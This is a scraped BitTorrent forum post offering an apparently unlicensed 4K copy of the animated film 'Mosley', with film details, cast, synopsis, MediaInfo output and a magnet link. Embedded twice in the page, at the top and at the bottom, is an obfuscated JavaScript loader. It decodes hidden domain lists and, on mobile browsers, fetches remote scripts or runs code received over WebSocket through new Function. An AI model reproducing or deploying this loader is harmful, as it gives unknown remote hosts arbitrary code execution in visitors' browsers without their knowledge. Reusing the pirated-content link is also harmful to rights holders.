直立象传说[国语配音/中文字幕].Mosley.2019.WEB-DL.4K.H265.DDP.5.1 3.52GB

版主小s 1月前 205

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 直立象传说 / 魔象传说 / 困兽 / Beast of Burden

◎片 名 Mosley

◎年 代 2019

◎产 地 新西兰 / 中国大陆

◎类 别 动画 / 奇幻 / 冒险

◎语 言 英语 / 汉语普通话

◎上映日期 2021-07-30(中国大陆) / 2019-10-04(罗马尼亚)

◎IMDb链接 https://www.imdb.com/title/tt5815016/

◎豆瓣链接 https://movie.douban.com/subject/26371812/

◎片 长 98分钟

◎导 演 黄军 Jun Huang (id:1320030)

柯比 Kirby Atkins (id:1410028)

◎编 剧 柯比 Kirby Atkins (id:1410028)

葛竞 Jing Ge (id:1428988)

◎演 员 特穆拉·莫里森 Temuera Morrison (id:1013898)

露西·劳莱丝 Lucy Lawless (id:1002669)

约翰·瑞斯-戴维斯 John Rhys-Davies (id:1147054)

瑞斯·达比 Rhys Darby (id:1000122)

柯比 Kirby Atkins (id:1410028)

蒂莫西拉比 Timothy Raby (id:1141561)

杨轶 Yi Yang (id:1342478)

邱秋 Qiu Qiu (id:1384857)

宝木中阳 Ming Song (id:1334350)

郭政建 Zhengjian Guo (id:1325740)

林强 Qiang Lin (id:1340112)

刘琮 Cong Liu (id:1348153)

张磊 Lei Zhang (id:1340809)

刘若班 Ruoban Liu (id:1382820)

巫蛊悠悠 Haojia Li (id:1407983)

徐燕 Yan Xu (id:1428990)

孟子焱 (id:1428991)

杨默 Mo Yang (id:1439713)

(id:1428989)

◎标 签 动画 / 奇幻 / 冒险 / 家庭 / 电影 / 新西兰 / 中国大陆 / 中国

◎简 介

《直立象传说》是一部适合家庭观赏的冒险故事,讲诉了桃栗象是驼重物的牲畜,在人类的压迫下过着艰辛的日子。然而在偶然的机会下,故事主人公木子李在儿子乐儿的要求下,前往了一个带有远古的秘密的山洞,发现原来桃栗象最初并非四脚爬行被奴役的动物,而是有手有脚且直立走路的雄伟生物。这可能吗?直立象真的存在?英勇的木子李决心探索这秘密,但紧追其后的赏金猎人是否会先将他擒下?木子李与他可爱的儿子乐儿必要学会面对他们的恐惧,面对他们的挑战,解开这能改变命运的谜。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 249712887924276111555428559531606423504 (0xBBDCF3ED034442EB9B8C09F1B7AE37D0)

  4. Complete name : Mosley 2019 WEB-DL 4K H265 DDP [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.52 GiB

  8. Duration : 1 h 37 min

  9. Overall bit rate : 5 184 kb/s

  10. Encoded date : UTC 2021-10-18 16:55:07

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 37 min

  20. Bit rate : 4 795 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 626 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.032

  30. Stream size : 3.26 GiB (92%)

  31. Writing library : HW265_Code

  32. Default : Yes

  33. Forced : No

  34. Color range : Limited

  35. Color primaries : BT.709

  36. Transfer characteristics : BT.709

  37. Matrix coefficients : BT.709


  38. Audio #1

  39. ID : 2

  40. Format : E-AC-3

  41. Format/Info : Enhanced AC-3

  42. Commercial name : Dolby Digital Plus

  43. Codec ID : A_EAC3

  44. Duration : 1 h 37 min

  45. Bit rate mode : Constant

  46. Bit rate : 256 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : L R C LFE Ls Rs

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 31.250 FPS (1536 SPF)

  51. Compression mode : Lossy

  52. Stream size : 178 MiB (5%)

  53. Language : Chinese

  54. Service kind : Complete Main

  55. Default : Yes

  56. Forced : No


  57. Audio #2

  58. ID : 3

  59. Format : AAC LC SBR

  60. Format/Info : Advanced Audio Codec Low Complexity with Spectral Band Replication

  61. Commercial name : HE-AAC

  62. Format settings : NBC

  63. Codec ID : A_AAC-5

  64. Duration : 1 h 37 min

  65. Bit rate : 132 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : C L R Ls Rs LFE

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 23.438 FPS (2048 SPF)

  70. Compression mode : Lossy

  71. Stream size : 91.2 MiB (3%)

  72. Language : Chinese

  73. Default : No

  74. Forced : No




复制代码


TAGS 奇幻 冒险 动画

磁力链:
  • magnet:?xt=urn:btih:E564B21537056392F8B884E4520A481739EE0BA0

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};